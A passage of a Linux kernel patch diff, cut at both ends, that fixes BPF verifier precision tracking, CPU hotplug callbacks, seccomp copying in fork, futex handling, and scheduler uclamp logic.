+ static void *realloc_array(void *arr, size_t old_n, size_t new_n, size_t size)
+ {
++	size_t alloc_size;
+ 	void *new_arr;
+ 
+ 	if (!new_n || old_n == new_n)
+ 		goto out;
+ 
+-	new_arr = krealloc_array(arr, new_n, size, GFP_KERNEL);
++	alloc_size = kmalloc_size_roundup(size_mul(new_n, size));
++	new_arr = krealloc(arr, alloc_size, GFP_KERNEL);
+ 	if (!new_arr) {
+ 		kfree(arr);
+ 		return NULL;
+@@ -2504,9 +2506,11 @@ static int push_jmp_history(struct bpf_verifier_env *env,
+ {
+ 	u32 cnt = cur->jmp_history_cnt;
+ 	struct bpf_idx_pair *p;
++	size_t alloc_size;
+ 
+ 	cnt++;
+-	p = krealloc(cur->jmp_history, cnt * sizeof(*p), GFP_USER);
++	alloc_size = kmalloc_size_roundup(size_mul(cnt, sizeof(*p)));
++	p = krealloc(cur->jmp_history, alloc_size, GFP_USER);
+ 	if (!p)
+ 		return -ENOMEM;
+ 	p[cnt - 1].idx = env->insn_idx;
+@@ -2768,7 +2772,7 @@ static void mark_all_scalars_precise(struct bpf_verifier_env *env,
+ 		}
+ }
+ 
+-static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
++static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int regno,
+ 				  int spi)
+ {
+ 	struct bpf_verifier_state *st = env->cur_state;
+@@ -2785,7 +2789,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
+ 	if (!env->bpf_capable)
+ 		return 0;
+ 
+-	func = st->frame[st->curframe];
++	func = st->frame[frame];
+ 	if (regno >= 0) {
+ 		reg = &func->regs[regno];
+ 		if (reg->type != SCALAR_VALUE) {
+@@ -2866,7 +2870,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
+ 			break;
+ 
+ 		new_marks = false;
+-		func = st->frame[st->curframe];
++		func = st->frame[frame];
+ 		bitmap_from_u64(mask, reg_mask);
+ 		for_each_set_bit(i, mask, 32) {
+ 			reg = &func->regs[i];
+@@ -2932,12 +2936,17 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
+ 
+ int mark_chain_precision(struct bpf_verifier_env *env, int regno)
+ {
+-	return __mark_chain_precision(env, regno, -1);
++	return __mark_chain_precision(env, env->cur_state->curframe, regno, -1);
+ }
+ 
+-static int mark_chain_precision_stack(struct bpf_verifier_env *env, int spi)
++static int mark_chain_precision_frame(struct bpf_verifier_env *env, int frame, int regno)
+ {
+-	return __mark_chain_precision(env, -1, spi);
++	return __mark_chain_precision(env, frame, regno, -1);
++}
++
++static int mark_chain_precision_stack_frame(struct bpf_verifier_env *env, int frame, int spi)
++{
++	return __mark_chain_precision(env, frame, -1, spi);
+ }
+ 
+ static bool is_spillable_regtype(enum bpf_reg_type type)
+@@ -3186,14 +3195,17 @@ static int check_stack_write_var_off(struct bpf_verifier_env *env,
+ 		stype = &state->stack[spi].slot_type[slot % BPF_REG_SIZE];
+ 		mark_stack_slot_scratched(env, spi);
+ 
+-		if (!env->allow_ptr_leaks
+-				&& *stype != NOT_INIT
+-				&& *stype != SCALAR_VALUE) {
+-			/* Reject the write if there's are spilled pointers in
+-			 * range. If we didn't reject here, the ptr status
+-			 * would be erased below (even though not all slots are
+-			 * actually overwritten), possibly opening the door to
+-			 * leaks.
++		if (!env->allow_ptr_leaks && *stype != STACK_MISC && *stype != STACK_ZERO) {
++			/* Reject the write if range we may write to has not
++			 * been initialized beforehand. If we didn't reject
++			 * here, the ptr status would be erased below (even
++			 * though not all slots are actually overwritten),
++			 * possibly opening the door to leaks.
++			 *
++			 * We do however catch STACK_INVALID case below, and
++			 * only allow reading possibly uninitialized memory
++			 * later for CAP_PERFMON, as the write may not happen to
++			 * that slot.
+ 			 */
+ 			verbose(env, "spilled ptr in range of var-offset stack write; insn %d, ptr off: %d",
+ 				insn_idx, i);
+@@ -5159,10 +5171,6 @@ static int check_stack_range_initialized(
+ 			goto mark;
+ 		}
+ 
+-		if (is_spilled_reg(&state->stack[spi]) &&
+-		    base_type(state->stack[spi].spilled_ptr.type) == PTR_TO_BTF_ID)
+-			goto mark;
+-
+ 		if (is_spilled_reg(&state->stack[spi]) &&
+ 		    (state->stack[spi].spilled_ptr.type == SCALAR_VALUE ||
+ 		     env->allow_ptr_leaks)) {
+@@ -5193,6 +5201,11 @@ mark:
+ 		mark_reg_read(env, &state->stack[spi].spilled_ptr,
+ 			      state->stack[spi].spilled_ptr.parent,
+ 			      REG_LIVE_READ64);
++		/* We do not set REG_LIVE_WRITTEN for stack slot, as we can not
++		 * be sure that whether stack slot is written to or not. Hence,
++		 * we must still conservatively propagate reads upwards even if
++		 * helper may write to the entire memory range.
++		 */
+ 	}
+ 	return update_stack_depth(env, state, min_off);
+ }
+@@ -9211,6 +9224,11 @@ static int adjust_reg_min_max_vals(struct bpf_verifier_env *env,
+ 				return err;
+ 			return adjust_ptr_min_max_vals(env, insn,
+ 						       dst_reg, src_reg);
++		} else if (dst_reg->precise) {
++			/* if dst_reg is precise, src_reg should be precise as well */
++			err = mark_chain_precision(env, insn->src_reg);
++			if (err)
++				return err;
+ 		}
+ 	} else {
+ 		/* Pretend the src is a reg with a known value, since we only
+@@ -11847,34 +11865,36 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ {
+ 	struct bpf_reg_state *state_reg;
+ 	struct bpf_func_state *state;
+-	int i, err = 0;
++	int i, err = 0, fr;
+ 
+-	state = old->frame[old->curframe];
+-	state_reg = state->regs;
+-	for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
+-		if (state_reg->type != SCALAR_VALUE ||
+-		    !state_reg->precise)
+-			continue;
+-		if (env->log.level & BPF_LOG_LEVEL2)
+-			verbose(env, "propagating r%d\n", i);
+-		err = mark_chain_precision(env, i);
+-		if (err < 0)
+-			return err;
+-	}
++	for (fr = old->curframe; fr >= 0; fr--) {
++		state = old->frame[fr];
++		state_reg = state->regs;
++		for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
++			if (state_reg->type != SCALAR_VALUE ||
++			    !state_reg->precise)
++				continue;
++			if (env->log.level & BPF_LOG_LEVEL2)
++				verbose(env, "frame %d: propagating r%d\n", i, fr);
++			err = mark_chain_precision_frame(env, fr, i);
++			if (err < 0)
++				return err;
++		}
+ 
+-	for (i = 0; i < state->allocated_stack / BPF_REG_SIZE; i++) {
+-		if (!is_spilled_reg(&state->stack[i]))
+-			continue;
+-		state_reg = &state->stack[i].spilled_ptr;
+-		if (state_reg->type != SCALAR_VALUE ||
+-		    !state_reg->precise)
+-			continue;
+-		if (env->log.level & BPF_LOG_LEVEL2)
+-			verbose(env, "propagating fp%d\n",
+-				(-i - 1) * BPF_REG_SIZE);
+-		err = mark_chain_precision_stack(env, i);
+-		if (err < 0)
+-			return err;
++		for (i = 0; i < state->allocated_stack / BPF_REG_SIZE; i++) {
++			if (!is_spilled_reg(&state->stack[i]))
++				continue;
++			state_reg = &state->stack[i].spilled_ptr;
++			if (state_reg->type != SCALAR_VALUE ||
++			    !state_reg->precise)
++				continue;
++			if (env->log.level & BPF_LOG_LEVEL2)
++				verbose(env, "frame %d: propagating fp%d\n",
++					(-i - 1) * BPF_REG_SIZE, fr);
++			err = mark_chain_precision_stack_frame(env, fr, i);
++			if (err < 0)
++				return err;
++		}
+ 	}
+ 	return 0;
+ }
+@@ -13386,6 +13406,10 @@ static int opt_subreg_zext_lo32_rnd_hi32(struct bpf_verifier_env *env,
+ 		if (!bpf_jit_needs_zext() && !is_cmpxchg_insn(&insn))
+ 			continue;
+ 
++		/* Zero-extension is done by the caller. */
++		if (bpf_pseudo_kfunc_call(&insn))
++			continue;
++
+ 		if (WARN_ON(load_reg == -1)) {
+ 			verbose(env, "verifier bug. zext_dst is set, but no reg is defined\n");
+ 			return -EFAULT;
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index bbad5e375d3ba..98a7a7b1471b7 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -663,21 +663,51 @@ static bool cpuhp_next_state(bool bringup,
+ 	return true;
+ }
+ 
+-static int cpuhp_invoke_callback_range(bool bringup,
+-				       unsigned int cpu,
+-				       struct cpuhp_cpu_state *st,
+-				       enum cpuhp_state target)
++static int __cpuhp_invoke_callback_range(bool bringup,
++					 unsigned int cpu,
++					 struct cpuhp_cpu_state *st,
++					 enum cpuhp_state target,
++					 bool nofail)
+ {
+ 	enum cpuhp_state state;
+-	int err = 0;
++	int ret = 0;
+ 
+ 	while (cpuhp_next_state(bringup, &state, st, target)) {
++		int err;
++
+ 		err = cpuhp_invoke_callback(cpu, state, bringup, NULL, NULL);
+-		if (err)
++		if (!err)
++			continue;
++
++		if (nofail) {
++			pr_warn("CPU %u %s state %s (%d) failed (%d)\n",
++				cpu, bringup ? "UP" : "DOWN",
++				cpuhp_get_step(st->state)->name,
++				st->state, err);
++			ret = -1;
++		} else {
++			ret = err;
+ 			break;
++		}
+ 	}
+ 
+-	return err;
++	return ret;
++}
++
++static inline int cpuhp_invoke_callback_range(bool bringup,
++					      unsigned int cpu,
++					      struct cpuhp_cpu_state *st,
++					      enum cpuhp_state target)
++{
++	return __cpuhp_invoke_callback_range(bringup, cpu, st, target, false);
++}
++
++static inline void cpuhp_invoke_callback_range_nofail(bool bringup,
++						      unsigned int cpu,
++						      struct cpuhp_cpu_state *st,
++						      enum cpuhp_state target)
++{
++	__cpuhp_invoke_callback_range(bringup, cpu, st, target, true);
+ }
+ 
+ static inline bool can_rollback_cpu(struct cpuhp_cpu_state *st)
+@@ -999,7 +1029,6 @@ static int take_cpu_down(void *_param)
+ 	struct cpuhp_cpu_state *st = this_cpu_ptr(&cpuhp_state);
+ 	enum cpuhp_state target = max((int)st->target, CPUHP_AP_OFFLINE);
+ 	int err, cpu = smp_processor_id();
+-	int ret;
+ 
+ 	/* Ensure this CPU doesn't handle any more interrupts. */
+ 	err = __cpu_disable();
+@@ -1012,13 +1041,10 @@ static int take_cpu_down(void *_param)
+ 	 */
+ 	WARN_ON(st->state != (CPUHP_TEARDOWN_CPU - 1));
+ 
+-	/* Invoke the former CPU_DYING callbacks */
+-	ret = cpuhp_invoke_callback_range(false, cpu, st, target);
+-
+ 	/*
+-	 * DYING must not fail!
++	 * Invoke the former CPU_DYING callbacks. DYING must not fail!
+ 	 */
+-	WARN_ON_ONCE(ret);
++	cpuhp_invoke_callback_range_nofail(false, cpu, st, target);
+ 
+ 	/* Give up timekeeping duties */
+ 	tick_handover_do_timer();
+@@ -1296,16 +1322,14 @@ void notify_cpu_starting(unsigned int cpu)
+ {
+ 	struct cpuhp_cpu_state *st = per_cpu_ptr(&cpuhp_state, cpu);
+ 	enum cpuhp_state target = min((int)st->target, CPUHP_AP_ONLINE);
+-	int ret;
+ 
+ 	rcu_cpu_starting(cpu);	/* Enables RCU usage on this CPU. */
+ 	cpumask_set_cpu(cpu, &cpus_booted_once_mask);
+-	ret = cpuhp_invoke_callback_range(true, cpu, st, target);
+ 
+ 	/*
+ 	 * STARTING must not fail!
+ 	 */
+-	WARN_ON_ONCE(ret);
++	cpuhp_invoke_callback_range_nofail(true, cpu, st, target);
+ }
+ 
+ /*
+@@ -2326,8 +2350,10 @@ static ssize_t target_store(struct device *dev, struct device_attribute *attr,
+ 
+ 	if (st->state < target)
+ 		ret = cpu_up(dev->id, target);
+-	else
++	else if (st->state > target)
+ 		ret = cpu_down(dev->id, target);
++	else if (WARN_ON(st->target != target))
++		st->target = target;
+ out:
+ 	unlock_device_hotplug();
+ 	return ret ? ret : count;
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 7f04f995c9754..732b392fc5c63 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -11193,13 +11193,15 @@ static int pmu_dev_alloc(struct pmu *pmu)
+ 
+ 	pmu->dev->groups = pmu->attr_groups;
+ 	device_initialize(pmu->dev);
+-	ret = dev_set_name(pmu->dev, "%s", pmu->name);
+-	if (ret)
+-		goto free_dev;
+ 
+ 	dev_set_drvdata(pmu->dev, pmu);
+ 	pmu->dev->bus = &pmu_bus;
+ 	pmu->dev->release = pmu_dev_release;
++
++	ret = dev_set_name(pmu->dev, "%s", pmu->name);
++	if (ret)
++		goto free_dev;
++
+ 	ret = device_add(pmu->dev);
+ 	if (ret)
+ 		goto free_dev;
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 08969f5aa38d5..844dfdc8c639c 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -535,6 +535,9 @@ void put_task_stack(struct task_struct *tsk)
+ 
+ void free_task(struct task_struct *tsk)
+ {
++#ifdef CONFIG_SECCOMP
++	WARN_ON_ONCE(tsk->seccomp.filter);
++#endif
+ 	release_user_cpus_ptr(tsk);
+ 	scs_release(tsk);
+ 
+@@ -2406,12 +2409,6 @@ static __latent_entropy struct task_struct *copy_process(
+ 
+ 	spin_lock(&current->sighand->siglock);
+ 
+-	/*
+-	 * Copy seccomp details explicitly here, in case they were changed
+-	 * before holding sighand lock.
+-	 */
+-	copy_seccomp(p);
+-
+ 	rv_task_fork(p);
+ 
+ 	rseq_fork(p, clone_flags);
+@@ -2428,6 +2425,14 @@ static __latent_entropy struct task_struct *copy_process(
+ 		goto bad_fork_cancel_cgroup;
+ 	}
+ 
++	/* No more failure paths after this point. */
++
++	/*
++	 * Copy seccomp details explicitly here, in case they were changed
++	 * before holding sighand lock.
++	 */
++	copy_seccomp(p);
++
+ 	init_task_pid_links(p);
+ 	if (likely(p->pid)) {
+ 		ptrace_init_task(p, (clone_flags & CLONE_PTRACE) || trace);
+diff --git a/kernel/futex/core.c b/kernel/futex/core.c
+index b22ef1efe7511..514e4582b8634 100644
+--- a/kernel/futex/core.c
++++ b/kernel/futex/core.c
+@@ -638,6 +638,7 @@ static int handle_futex_death(u32 __user *uaddr, struct task_struct *curr,
+ 			      bool pi, bool pending_op)
+ {
+ 	u32 uval, nval, mval;
++	pid_t owner;
+ 	int err;
+ 
+ 	/* Futex address must be 32bit aligned */
+@@ -659,6 +660,10 @@ retry:
+ 	 * 2. A woken up waiter is killed before it can acquire the
+ 	 *    futex in user space.
+ 	 *
++	 * In the second case, the wake up notification could be generated
++	 * by the unlock path in user space after setting the futex value
++	 * to zero or by the kernel after setting the OWNER_DIED bit below.
++	 *
+ 	 * In both cases the TID validation below prevents a wakeup of
+ 	 * potential waiters which can cause these waiters to block
+ 	 * forever.
+@@ -667,24 +672,27 @@ retry:
+ 	 *
+ 	 *	1) task->robust_list->list_op_pending != NULL
+ 	 *	   @pending_op == true
+-	 *	2) User space futex value == 0
++	 *	2) The owner part of user space futex value == 0
+ 	 *	3) Regular futex: @pi == false
+ 	 *
+ 	 * If these conditions are met, it is safe to attempt waking up a
+ 	 * potential waiter without touching the user space futex value and
+-	 * trying to set the OWNER_DIED bit. The user space futex value is
+-	 * uncontended and the rest of the user space mutex state is
+-	 * consistent, so a woken waiter will just take over the
+-	 * uncontended futex. Setting the OWNER_DIED bit would create
+-	 * inconsistent state and malfunction of the user space owner died
+-	 * handling.
++	 * trying to set the OWNER_DIED bit. If the futex value is zero,
++	 * the rest of the user space mutex state is consistent, so a woken
++	 * waiter will just take over the uncontended futex. Setting the
++	 * OWNER_DIED bit would create inconsistent state and malfunction
++	 * of the user space owner died handling. Otherwise, the OWNER_DIED
++	 * bit is already set, and the woken waiter is expected to deal with
++	 * this.
+ 	 */
+-	if (pending_op && !pi && !uval) {
++	owner = uval & FUTEX_TID_MASK;
++
++	if (pending_op && !pi && !owner) {
+ 		futex_wake(uaddr, 1, 1, FUTEX_BITSET_MATCH_ANY);
+ 		return 0;
+ 	}
+ 
+-	if ((uval & FUTEX_TID_MASK) != task_pid_vnr(curr))
++	if (owner != task_pid_vnr(curr))
+ 		return 0;
+ 
+ 	/*
+diff --git a/kernel/gcov/gcc_4_7.c b/kernel/gcov/gcc_4_7.c
+index 7971e989e425b..74a4ef1da9ad7 100644
+--- a/kernel/gcov/gcc_4_7.c
++++ b/kernel/gcov/gcc_4_7.c
+@@ -82,6 +82,7 @@ struct gcov_fn_info {
+  * @version: gcov version magic indicating the gcc version used for compilation
+  * @next: list head for a singly-linked list
+  * @stamp: uniquifying time stamp
++ * @checksum: unique object checksum
+  * @filename: name of the associated gcov data file
+  * @merge: merge functions (null for unused counter type)
+  * @n_functions: number of instrumented functions
+@@ -94,6 +95,10 @@ struct gcov_info {
+ 	unsigned int version;
+ 	struct gcov_info *next;
+ 	unsigned int stamp;
++ /* Since GCC 12.1 a checksum field is added. */
++#if (__GNUC__ >= 12)
++	unsigned int checksum;
++#endif
+ 	const char *filename;
+ 	void (*merge[GCOV_COUNTERS])(gcov_type *, unsigned int);
+ 	unsigned int n_functions;
+diff --git a/kernel/irq/internals.h b/kernel/irq/internals.h
+index f09c60393e559..5fdc0b5575797 100644
+--- a/kernel/irq/internals.h
++++ b/kernel/irq/internals.h
+@@ -52,6 +52,7 @@ enum {
+  * IRQS_PENDING			- irq is pending and replayed later
+  * IRQS_SUSPENDED		- irq is suspended
+  * IRQS_NMI			- irq line is used to deliver NMIs
++ * IRQS_SYSFS			- descriptor has been added to sysfs
+  */
+ enum {
+ 	IRQS_AUTODETECT		= 0x00000001,
+@@ -64,6 +65,7 @@ enum {
+ 	IRQS_SUSPENDED		= 0x00000800,
+ 	IRQS_TIMINGS		= 0x00001000,
+ 	IRQS_NMI		= 0x00002000,
++	IRQS_SYSFS		= 0x00004000,
+ };
+ 
+ #include "debug.h"
+diff --git a/kernel/irq/irqdesc.c b/kernel/irq/irqdesc.c
+index a91f9001103ce..fd09962744014 100644
+--- a/kernel/irq/irqdesc.c
++++ b/kernel/irq/irqdesc.c
+@@ -288,22 +288,25 @@ static void irq_sysfs_add(int irq, struct irq_desc *desc)
+ 	if (irq_kobj_base) {
+ 		/*
+ 		 * Continue even in case of failure as this is nothing
+-		 * crucial.
++		 * crucial and failures in the late irq_sysfs_init()
++		 * cannot be rolled back.
+ 		 */
+ 		if (kobject_add(&desc->kobj, irq_kobj_base, "%d", irq))
+ 			pr_warn("Failed to add kobject for irq %d\n", irq);
++		else
++			desc->istate |= IRQS_SYSFS;
+ 	}
+ }
+ 
+ static void irq_sysfs_del(struct irq_desc *desc)
+ {
+ 	/*
+-	 * If irq_sysfs_init() has not yet been invoked (early boot), then
+-	 * irq_kobj_base is NULL and the descriptor was never added.
+-	 * kobject_del() complains about a object with no parent, so make
+-	 * it conditional.
++	 * Only invoke kobject_del() when kobject_add() was successfully
++	 * invoked for the descriptor. This covers both early boot, where
++	 * sysfs is not initialized yet, and the case of a failed
++	 * kobject_add() invocation.
+ 	 */
+-	if (irq_kobj_base)
++	if (desc->istate & IRQS_SYSFS)
+ 		kobject_del(&desc->kobj);
+ }
+ 
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 3050631e528d9..a35074f0daa1a 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -2364,6 +2364,14 @@ static void kill_kprobe(struct kprobe *p)
+ 
+ 	lockdep_assert_held(&kprobe_mutex);
+ 
++	/*
++	 * The module is going away. We should disarm the kprobe which
++	 * is using ftrace, because ftrace framework is still available at
++	 * 'MODULE_STATE_GOING' notification.
++	 */
++	if (kprobe_ftrace(p) && !kprobe_disabled(p) && !kprobes_all_disarmed)
++		disarm_kprobe_ftrace(p);
++
+ 	p->flags |= KPROBE_FLAG_GONE;
+ 	if (kprobe_aggrprobe(p)) {
+ 		/*
+@@ -2380,14 +2388,6 @@ static void kill_kprobe(struct kprobe *p)
+ 	 * the original probed function (which will be freed soon) any more.
+ 	 */
+ 	arch_remove_kprobe(p);
+-
+-	/*
+-	 * The module is going away. We should disarm the kprobe which
+-	 * is using ftrace, because ftrace framework is still available at
+-	 * 'MODULE_STATE_GOING' notification.
+-	 */
+-	if (kprobe_ftrace(p) && !kprobe_disabled(p) && !kprobes_all_disarmed)
+-		disarm_kprobe_ftrace(p);
+ }
+ 
+ /* Disable one kprobe */
+diff --git a/kernel/module/decompress.c b/kernel/module/decompress.c
+index c033572d83f0e..720e719253cd1 100644
+--- a/kernel/module/decompress.c
++++ b/kernel/module/decompress.c
+@@ -114,8 +114,8 @@ static ssize_t module_gzip_decompress(struct load_info *info,
+ 	do {
+ 		struct page *page = module_get_next_page(info);
+ 
+-		if (!page) {
+-			retval = -ENOMEM;
++		if (IS_ERR(page)) {
++			retval = PTR_ERR(page);
+ 			goto out_inflate_end;
+ 		}
+ 
+@@ -173,8 +173,8 @@ static ssize_t module_xz_decompress(struct load_info *info,
+ 	do {
+ 		struct page *page = module_get_next_page(info);
+ 
+-		if (!page) {
+-			retval = -ENOMEM;
++		if (IS_ERR(page)) {
++			retval = PTR_ERR(page);
+ 			goto out;
+ 		}
+ 
+diff --git a/kernel/padata.c b/kernel/padata.c
+index e5819bb8bd1dc..de90af5fcbe6b 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -207,14 +207,16 @@ int padata_do_parallel(struct padata_shell *ps,
+ 	pw = padata_work_alloc();
+ 	spin_unlock(&padata_works_lock);
+ 
++	if (!pw) {
++		/* Maximum works limit exceeded, run in the current task. */
++		padata->parallel(padata);
++	}
++
+ 	rcu_read_unlock_bh();
+ 
+ 	if (pw) {
+ 		padata_work_init(pw, padata_parallel_worker, padata, 0);
+ 		queue_work(pinst->parallel_wq, &pw->pw_work);
+-	} else {
+-		/* Maximum works limit exceeded, run in the current task. */
+-		padata->parallel(padata);
+ 	}
+ 
+ 	return 0;
+@@ -388,13 +390,16 @@ void padata_do_serial(struct padata_priv *padata)
+ 	int hashed_cpu = padata_cpu_hash(pd, padata->seq_nr);
+ 	struct padata_list *reorder = per_cpu_ptr(pd->reorder_list, hashed_cpu);
+ 	struct padata_priv *cur;
++	struct list_head *pos;
+ 
+ 	spin_lock(&reorder->lock);
+ 	/* Sort in ascending order of sequence number. */
+-	list_for_each_entry_reverse(cur, &reorder->list, list)
++	list_for_each_prev(pos, &reorder->list) {
++		cur = list_entry(pos, struct padata_priv, list);
+ 		if (cur->seq_nr < padata->seq_nr)
+ 			break;
+-	list_add(&padata->list, &cur->list);
++	}
++	list_add(&padata->list, pos);
+ 	spin_unlock(&reorder->lock);
+ 
+ 	/*
+diff --git a/kernel/power/snapshot.c b/kernel/power/snapshot.c
+index 2a406753af904..c20ca5fb9adc8 100644
+--- a/kernel/power/snapshot.c
++++ b/kernel/power/snapshot.c
+@@ -1723,8 +1723,8 @@ static unsigned long minimum_image_size(unsigned long saveable)
+  * /sys/power/reserved_size, respectively).  To make this happen, we compute the
+  * total number of available page frames and allocate at least
+  *
+- * ([page frames total] + PAGES_FOR_IO + [metadata pages]) / 2
+- *  + 2 * DIV_ROUND_UP(reserved_size, PAGE_SIZE)
++ * ([page frames total] - PAGES_FOR_IO - [metadata pages]) / 2
++ *  - 2 * DIV_ROUND_UP(reserved_size, PAGE_SIZE)
+  *
+  * of them, which corresponds to the maximum size of a hibernation image.
+  *
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 93416afebd59c..14d9384fba056 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -2418,7 +2418,7 @@ void rcu_force_quiescent_state(void)
+ 	struct rcu_node *rnp_old = NULL;
+ 
+ 	/* Funnel through hierarchy to reduce memory contention. */
+-	rnp = __this_cpu_read(rcu_data.mynode);
++	rnp = raw_cpu_read(rcu_data.mynode);
+ 	for (; rnp != NULL; rnp = rnp->parent) {
+ 		ret = (READ_ONCE(rcu_state.gp_flags) & RCU_GP_FLAG_FQS) ||
+ 		       !raw_spin_trylock(&rnp->fqslock);
+diff --git a/kernel/relay.c b/kernel/relay.c
+index d7edc934c56d5..88bcb09f0a1f2 100644
+--- a/kernel/relay.c
++++ b/kernel/relay.c
+@@ -148,13 +148,13 @@ static struct rchan_buf *relay_create_buf(struct rchan *chan)
+ {
+ 	struct rchan_buf *buf;
+ 
+-	if (chan->n_subbufs > KMALLOC_MAX_SIZE / sizeof(size_t *))
++	if (chan->n_subbufs > KMALLOC_MAX_SIZE / sizeof(size_t))
+ 		return NULL;
+ 
+ 	buf = kzalloc(sizeof(struct rchan_buf), GFP_KERNEL);
+ 	if (!buf)
+ 		return NULL;
+-	buf->padding = kmalloc_array(chan->n_subbufs, sizeof(size_t *),
++	buf->padding = kmalloc_array(chan->n_subbufs, sizeof(size_t),
+ 				     GFP_KERNEL);
+ 	if (!buf->padding)
+ 		goto free_buf;
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index daff72f003858..535af9fbea7b8 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -1392,7 +1392,7 @@ static inline void uclamp_idle_reset(struct rq *rq, enum uclamp_id clamp_id,
+ 	if (!(rq->uclamp_flags & UCLAMP_FLAG_IDLE))
+ 		return;
+ 
+-	WRITE_ONCE(rq->uclamp[clamp_id].value, clamp_value);
++	uclamp_rq_set(rq, clamp_id, clamp_value);
+ }
+ 
+ static inline
+@@ -1543,8 +1543,8 @@ static inline void uclamp_rq_inc_id(struct rq *rq, struct task_struct *p,
+ 	if (bucket->tasks == 1 || uc_se->value > bucket->value)
+ 		bucket->value = uc_se->value;
+ 
+-	if (uc_se->value > READ_ONCE(uc_rq->value))
+-		WRITE_ONCE(uc_rq->value, uc_se->value);
++	if (uc_se->value > uclamp_rq_get(rq, clamp_id))
++		uclamp_rq_set(rq, clamp_id, uc_se->value);
+ }
+ 
+ /*
+@@ -1610,7 +1610,7 @@ static inline void uclamp_rq_dec_id(struct rq *rq, struct task_struct *p,
+ 	if (likely(bucket->tasks))
+ 		return;
+ 
+-	rq_clamp = READ_ONCE(uc_rq->value);
++	rq_clamp = uclamp_rq_get(rq, clamp_id);
+ 	/*
+ 	 * Defensive programming: this should never happen. If it happens,
+ 	 * e.g. due to future modification, warn and fixup the expected value.
+@@ -1618,7 +1618,7 @@ static inline void uclamp_rq_dec_id(struct rq *rq, struct task_struct *p,
+ 	SCHED_WARN_ON(bucket->value > rq_clamp);
+ 	if (bucket->value >= rq_clamp) {
+ 		bkt_clamp = uclamp_rq_max_value(rq, clamp_id, uc_se->value);
+-		WRITE_ONCE(uc_rq->value, bkt_clamp);
++		uclamp_rq_set(rq, clamp_id, bkt_clamp);
+ 	}
+ }
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index e4a0b8bd941c7..0f32acb05055f 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4280,14 +4280,16 @@ static inline unsigned long task_util_est(struct task_struct *p)
+ }
+ 
+ #ifdef CONFIG_UCLAMP_TASK
+-static inline unsigned long uclamp_task_util(struct task_struct *p)
++static inline unsigned long uclamp_task_util(struct task_struct *p,
++					     unsigned long uclamp_min,
++					     unsigned long uclamp_max)
+ {
+-	return clamp(task_util_est(p),
+-		     uclamp_eff_value(p, UCLAMP_MIN),
+-		     uclamp_eff_value(p, UCLAMP_MAX));
++	return clamp(task_util_est(p), uclamp_min, uclamp_max);
+ }
+ #else
+-static inline unsigned long uclamp_task_util(struct task_struct *p)
++static inline unsigned long uclamp_task_util(struct task_struct *p,
++					     unsigned long uclamp_min,
++					     unsigned long uclamp_max)
+ {
+ 	return task_util_est(p);
+ }
+@@ -4426,10 +4428,135 @@ done:
+ 	trace_sched_util_est_se_tp(&p->se);
+ }
+ 
+-static inline int task_fits_capacity(struct task_struct *p,
+-				     unsigned long capacity)
++static inline int util_fits_cpu(unsigned long util,
++				unsigned long uclamp_min,
++				unsigned long uclamp_max,
++				int cpu)
+ {
+-	return fits_capacity(uclamp_task_util(p), capacity);
++	unsigned long capacity_orig, capacity_orig_thermal;
++	unsigned long capacity = capacity_of(cpu);
++	bool fits, uclamp_max_fits;
++
++	/*
++	 * Check if the real util fits without any uclamp boost/cap applied.
++	 */
++	fits = fits_capacity(util, capacity);
++
++	if (!uclamp_is_used())
++		return fits;
++
++	/*
++	 * We must use capacity_orig_of() for comparing against uclamp_min and
++	 * uclamp_max. We only care about capacity pressure (by using
++	 * capacity_of()) for comparing against the real util.
++	 *
++	 * If a task is boosted to 1024 for example, we don't want a tiny
++	 * pressure to skew the check whether it fits a CPU or not.
++	 *
++	 * Similarly if a task is capped to capacity_orig_of(little_cpu), it
++	 * should fit a little cpu even if there's some pressure.
++	 *
++	 * Only exception is for thermal pressure since it has a direct impact
++	 * on available OPP of the system.
++	 *
++	 * We honour it for uclamp_min only as a drop in performance level
++	 * could result in not getting the requested minimum performance level.
++	 *
++	 * For uclamp_max, we can tolerate a drop in performance level as the
++	 * goal is to cap the task. So it's okay if it's getting less.
++	 *
++	 * In case of capacity inversion, which is not handled yet, we should
++	 * honour the inverted capacity for both uclamp_min and uclamp_max all
++	 * the time.
++	 */
++	capacity_orig = capacity_orig_of(cpu);
++	capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
++
++	/*
++	 * We want to force a task to fit a cpu as implied by uclamp_max.
++	 * But we do have some corner cases to cater for..
++	 *
++	 *
++	 *                                 C=z
++	 *   |                             ___
++	 *   |                  C=y       |   |
++	 *   |_ _ _ _ _ _ _ _ _ ___ _ _ _ | _ | _ _ _ _ _  uclamp_max
++	 *   |      C=x        |   |      |   |
++	 *   |      ___        |   |      |   |
++	 *   |     |   |       |   |      |   |    (util somewhere in this region)
++	 *   |     |   |       |   |      |   |
++	 *   |     |   |       |   |      |   |
++	 *   +----------------------------------------
++	 *         cpu0        cpu1       cpu2
++	 *
++	 *   In the above example if a task is capped to a specific performance
++	 *   point, y, then when:
++	 *
++	 *   * util = 80% of x then it does not fit on cpu0 and should migrate
++	 *     to cpu1
++	 *   * util = 80% of y then it is forced to fit on cpu1 to honour
++	 *     uclamp_max request.
